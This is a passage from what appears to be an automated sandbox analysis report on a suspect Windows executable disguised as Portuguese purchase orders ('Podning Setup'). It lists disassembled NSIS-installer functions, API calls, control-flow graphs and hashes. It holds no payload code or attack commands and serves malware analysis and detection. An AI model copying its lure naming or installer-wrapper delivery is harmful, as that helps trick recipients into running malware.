* 2 173->174 174->164 178 4055f2-40560d SendMessageW 175->178 179 405449-40544f call 404149 176->179 177->179 178->178 180 40560f-405632 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->173 182 405634-40565b SendMessageW 180->182 182->182 183 40565d-405671 GlobalUnlock SetClipboardData CloseClipboard 182->183 183->164
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040534C
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040535B
                                                                                              • GetClientRect.USER32(?,?), ref: 00405398
                                                                                              • GetSystemMetrics.USER32(00000002), ref: 0040539F
                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040543B
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040545C
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040536A
                                                                                                • Part of subcall function 00404149: SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004054AE
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005282,00000000), ref: 004054BC
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054C3
                                                                                              • ShowWindow.USER32(00000000), ref: 004054E7
                                                                                              • ShowWindow.USER32(0001045E,00000008), ref: 004054EC
                                                                                              • ShowWindow.USER32(00000008), ref: 00405536
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
                                                                                              • CreatePopupMenu.USER32 ref: 0040557B
                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
                                                                                              • GetWindowRect.USER32(?,?), ref: 004055AF
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405610
                                                                                              • EmptyClipboard.USER32 ref: 00405616
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040562C
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405660
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
                                                                                              • CloseClipboard.USER32 ref: 00405671
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                              • String ID: {
                                                                                              • API String ID: 4154960007-366298937
                                                                                              • Opcode ID: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
                                                                                              • Instruction ID: 691c8e7aa241a152ccc1fa1da29986a8db7386483fecbbc97dabe6f77f48909a
                                                                                              • Opcode Fuzzy Hash: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
                                                                                              • Instruction Fuzzy Hash: D4B14971800608BFDB119FA0DD89EAE7B79FB48355F00803AFA41BA1A0CB755E51DF68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406072 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 428 406072-40607d 429 406090-4060a6 428->429 430 40607f-40608e 428->430 431 4060ac-4060b9 429->431 432 4062be-4062c4 429->432 430->429 431->432 435 4060bf-4060c6 431->435 433 4062ca-4062d5 432->433 434 4060cb-4060d8 432->434 436 4062e0-4062e1 433->436 437 4062d7-4062db call 406050 433->437 434->433 438 4060de-4060ea 434->438 435->432 437->436 440 4060f0-40612c 438->440 441 4062ab 438->441 442 406132-40613d GetVersion 440->442 443 40624c-406250 440->443 444 4062b9-4062bc 441->444 445 4062ad-4062b7 441->445 448 406157 442->448 449 40613f-406143 442->449 446 406252-406256 443->446 447 406285-406289 443->447 444->432 445->432 451 406266-406273 call 406050 446->451 452 406258-406264 call 405f97 446->452 454 406298-4062a9 lstrlenW 447->454 455 40628b-406293 call 406072 447->455 453 40615e-406165 448->453 449->448 450 406145-406149 449->450 450->448 456 40614b-40614f 450->456 466 406278-406281 451->466 452->466 458 406167-406169 453->458 459 40616a-40616c 453->459 454->432 455->454 456->448 462 406151-406155 456->462 458->459 464 4061a8-4061ab 459->464 465 40616e-40618b call 405f1d 459->465 462->453 469 4061bb-4061be 464->469 470 4061ad-4061b9 GetSystemDirectoryW 464->470 473 406190-406194 465->473 466->454 468 406283 466->468 474 406244-40624a call 4062e4 468->474 471 4061c0-4061ce GetWindowsDirectoryW 469->471 472 406229-40622b 469->472 475 40622d-406231 470->475 471->472 472->475 476 4061d0-4061da 472->476 477 406233-406237 473->477 478 40619a-4061a3 call 406072 473->478 474->454 475->474 475->477 480 4061f4-40620a SHGetSpecialFolderLocation 476->480 481 4061dc-4061df 476->481 477->474 483 406239-40623f lstrcatW 477->483 478->475 486 406225 480->486 487 40620c-406223 SHGetPathFromIDListW CoTaskMemFree 480->487 481->480 485 4061e1-4061e8 481->485 483->474 489 4061f0-4061f2 485->489 486->472 487->475 487->486 489->475 489->480
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00000000,Completed,?,004051E6,Completed,00000000,00000000,?), ref: 00406135
                                                                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004061B3
                                                                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004061C6
                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
                                                                                              • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406210
                                                                                              • CoTaskMemFree.OLE32(?), ref: 0040621B
                                                                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
                                                                                              • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051E6,Completed,00000000,00000000,?), ref: 00406299
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                              • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 900638850-905382516
                                                                                              • Opcode ID: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                                                              • Instruction ID: 6a0e75f8176bdfaa808a817e977aa907b1c5d4b6119349843486ba00336cef2a
                                                                                              • Opcode Fuzzy Hash: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                                                              • Instruction Fuzzy Hash: 45611E71A00105ABDF20AF65CC41AEE37A5EF45314F12817FE852BA2D0D73D8AA1CB4D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405841 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 490 405841-405867 call 405b0c 493 405880-405887 490->493 494 405869-40587b DeleteFileW 490->494 496 405889-40588b 493->496 497 40589a-4058aa call 406050 493->497 495 4059fd-405a01 494->495 498 405891-405894 496->498 499 4059ab-4059b0 496->499 505 4058b9-4058ba call 405a50 497->505 506 4058ac-4058b7 lstrcatW 497->506 498->497 498->499 499->495 501 4059b2-4059b5 499->501 503 4059b7-4059bd 501->503 504 4059bf-4059c7 call 406393 501->504 503->495 504->495 514 4059c9-4059dd call 405a04 call 4057f9 504->514 507 4058bf-4058c3 505->507 506->507 510 4058c5-4058cd 507->510 511 4058cf-4058d5 lstrcatW 507->511 510->511 513 4058da-4058f6 lstrlenW FindFirstFileW 510->513 511->513 515 4059a0-4059a4 513->515 516 4058fc-405904 513->516 530 4059f5-4059f8 call 4051af 514->530 531 4059df-4059e2 514->531 515->499 518 4059a6 515->518 519 405924-405938 call 406050 516->519 520 405906-40590e 516->520 518->499 532 40593a-405942 519->532 533 40594f-40595a call 4057f9 519->533 522 405910-405918 520->522 523 405983-405993 FindNextFileW 520->523 522->519 526 40591a-405922 522->526 523->516 529 405999-40599a FindClose 523->529 526->519 526->523 529->515 530->495 531->503 536 4059e4-4059f3 call 4051af call 405ef1 531->536 532->523 537 405944-40594d call 405841 532->537 542 40597b-40597e call 4051af 533->542 543 40595c-40595f 533->543 536->495 537->523 542->523 546 405961-405971 call 4051af call 405ef1 543->546 547 405973-405979 543->547 546->523 547->523
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
                                                                                              • lstrcatW.KERNEL32(0042F250,\*.*), ref: 004058B2
                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 004058D5
                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
                                                                                              • FindFirstFileW.KERNELBASE(0042F250,?,?,?,0040A014,?,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040599A
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
                                                                                              • "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe", xrefs: 00405841
                                                                                              • \*.*, xrefs: 004058AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                              • API String ID: 2035342205-1522382464
                                                                                              • Opcode ID: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                              • Instruction ID: caf420165dc21d0a99f0983ed575dd8be70d76c6b9b5ff92ec706b465e099e4b
                                                                                              • Opcode Fuzzy Hash: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                              • Instruction Fuzzy Hash: DB41B171800A14EADB21AB65CD49BBF7678EF85764F10423BF801B11D1D77C4A82DE6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406393 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(74DF3420,00430298,0042FA50,00405B55,0042FA50,0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
                                                                                              • FindClose.KERNEL32(00000000), ref: 004063AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                              • Instruction ID: 351587cf9ce3a522800e1c73501a9738d9f8821b35168cd3fdb078f4a7df3edc
                                                                                              • Opcode Fuzzy Hash: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                              • Instruction Fuzzy Hash: C2D012315081209BC34157787E0C84B7B5C9F1A3317259F36F96AF12E1CB348C2286DC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: 2a574175ecbbc16c159877bdabd45a4d71ca268d0464789ebb34cd10c835fca0
                                                                                              • Instruction ID: 34d4ac1ca0ba7345d9811ef03afe410f99a72e11e7e6ea98f315d3ade0c6d005
                                                                                              • Opcode Fuzzy Hash: 2a574175ecbbc16c159877bdabd45a4d71ca268d0464789ebb34cd10c835fca0
                                                                                              • Instruction Fuzzy Hash: 32F08C71A012149BDB01EBA4DE49AAEB378FF45324F20457BE105F21E1E7B89A409B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403C3C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 184 403c3c-403c4e 185 403c54-403c5a 184->185 186 403d8f-403d9e 184->186 185->186 187 403c60-403c69 185->187 188 403da0-403de8 GetDlgItem * 2 call 404114 SetClassLongW call 40140b 186->188 189 403ded-403e02 186->189 193 403c6b-403c78 SetWindowPos 187->193 194 403c7e-403c81 187->194 188->189 191 403e42-403e47 call 404160 189->191 192 403e04-403e07 189->192 206 403e4c-403e67 191->206 198 403e09-403e14 call 401389 192->198 199 403e3a-403e3c 192->199 193->194 195 403c83-403c95 ShowWindow 194->195 196 403c9b-403ca1 194->196 195->196 201 403ca3-403cb8 DestroyWindow 196->201 202 403cbd-403cc0 196->202 198->199 219 403e16-403e35 SendMessageW 198->219 199->191 205 4040e1 199->205 208 4040be-4040c4 201->208 210 403cc2-403cce SetWindowLongW 202->210 211 403cd3-403cd9 202->211 207 4040e3-4040ea 205->207 213 403e70-403e76 206->213 214 403e69-403e6b call 40140b 206->214 208->205 220 4040c6-4040cc 208->220 210->207 217 403d7c-403d8a call 40417b 211->217 218 403cdf-403cf0 GetDlgItem 211->218 215 403e7c-403e87 213->215 216 40409f-4040b8 DestroyWindow EndDialog 213->216 214->213 215->216 222 403e8d-403eda call 406072 call 404114 * 3 GetDlgItem 215->222 216->208 217->207 223 403cf2-403d09 SendMessageW IsWindowEnabled 218->223 224 403d0f-403d12 218->224 219->207 220->205 226 4040ce-4040d7 ShowWindow 220->226 254 403ee4-403f20 ShowWindow KiUserCallbackDispatcher call 404136 EnableWindow 222->254 255 403edc-403ee1 222->255 223->205 223->224 228 403d14-403d15 224->228 229 403d17-403d1a 224->229 226->205 232 403d45-403d4a call 4040ed 228->232 233 403d28-403d2d 229->233 234 403d1c-403d22 229->234 232->217 237 403d63-403d76 SendMessageW 233->237 239 403d2f-403d35 233->239 234->237 238 403d24-403d26 234->238 237->217 238->232 242 403d37-403d3d call 40140b 239->242 243 403d4c-403d55 call 40140b 239->243 250 403d43 242->250 243->217 252 403d57-403d61 243->252 250->232 252->250 258 403f22-403f23 254->258 259 403f25 254->259 255->254 260 403f27-403f55 GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 403f57-403f68 SendMessageW 260->261 262 403f6a 260->262 263 403f70-403fae call 404149 call 406050 lstrlenW call 406072 SetWindowTextW call 401389 261->263 262->263 263->206 272 403fb4-403fb6 263->272 272->206 273 403fbc-403fc0 272->273 274 403fc2-403fc8 273->274 275 403fdf-403ff3 DestroyWindow 273->275 274->205 276 403fce-403fd4 274->276 275->208 277 403ff9-404026 CreateDialogParamW 275->277 276->206 278 403fda 276->278 277->208 279 40402c-404083 call 404114 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->205 279->205 284 404085-404098 ShowWindow call 404160 279->284 286 40409d 284->286 286->208
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
                                                                                              • ShowWindow.USER32(?), ref: 00403C95
                                                                                              • DestroyWindow.USER32 ref: 00403CA9
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
                                                                                              • GetDlgItem.USER32(?,?), ref: 00403CE6
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D01
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403DAF
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403DB9
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E24
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403ECA
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403EEB
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
                                                                                              • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F2E
                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403F35
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F4D
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
                                                                                              • lstrlenW.KERNEL32(0042D248,?,0042D248,Podning Setup), ref: 00403F89
                                                                                              • SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004040D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID: Podning Setup
                                                                                              • API String ID: 3282139019-771305457
                                                                                              • Opcode ID: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                              • Instruction ID: 977002fee4e807fcea2a4689fe207fdbad8331f3a024ab3ce592dbd86d7f0908
                                                                                              • Opcode Fuzzy Hash: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                              • Instruction Fuzzy Hash: 2EC1D171504204BFDB216F61EE89E2B3A69FB88706F04053EF641B21F0CB799991DB6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403899 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 287 403899-4038b1 call 40642a 290 4038b3-4038c3 call 405f97 287->290 291 4038c5-4038fc call 405f1d 287->291 300 40391f-403948 call 403b6f call 405b0c 290->300 296 403914-40391a lstrcatW 291->296 297 4038fe-40390f call 405f1d 291->297 296->300 297->296 305 4039da-4039e2 call 405b0c 300->305 306 40394e-403953 300->306 312 4039f0-403a15 LoadImageW 305->312 313 4039e4-4039eb call 406072 305->313 306->305 308 403959-403981 call 405f1d 306->308 308->305 314 403983-403987 308->314 316 403a96-403a9e call 40140b 312->316 317 403a17-403a47 RegisterClassW 312->317 313->312 318 403999-4039a5 lstrlenW 314->318 319 403989-403996 call 405a31 314->319 330 403aa0-403aa3 316->330 331 403aa8-403ab3 call 403b6f 316->331 320 403b65 317->320 321 403a4d-403a91 SystemParametersInfoW CreateWindowExW 317->321 325 4039a7-4039b5 lstrcmpiW 318->325 326 4039cd-4039d5 call 405a04 call 406050 318->326 319->318 324 403b67-403b6e 320->324 321->316 325->326 329 4039b7-4039c1 GetFileAttributesW 325->329 326->305 333 4039c3-4039c5 329->333 334 4039c7-4039c8 call 405a50 329->334 330->324 340 403ab9-403ad3 ShowWindow call 4063ba 331->340 341 403b3c-403b3d call 405282 331->341 333->326 333->334 334->326 346 403ad5-403ada call 4063ba 340->346 347 403adf-403af1 GetClassInfoW 340->347 345 403b42-403b44 341->345 348 403b46-403b4c 345->348 349 403b5e-403b60 call 40140b 345->349 346->347 352 403af3-403b03 GetClassInfoW RegisterClassW 347->352 353 403b09-403b2c DialogBoxParamW call 40140b 347->353 348->330 354 403b52-403b59 call 40140b 348->354 349->320 352->353 358 403b31-403b3a call 4037e9 353->358 354->330 358->324
                                                                                              APIs
                                                                                                • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
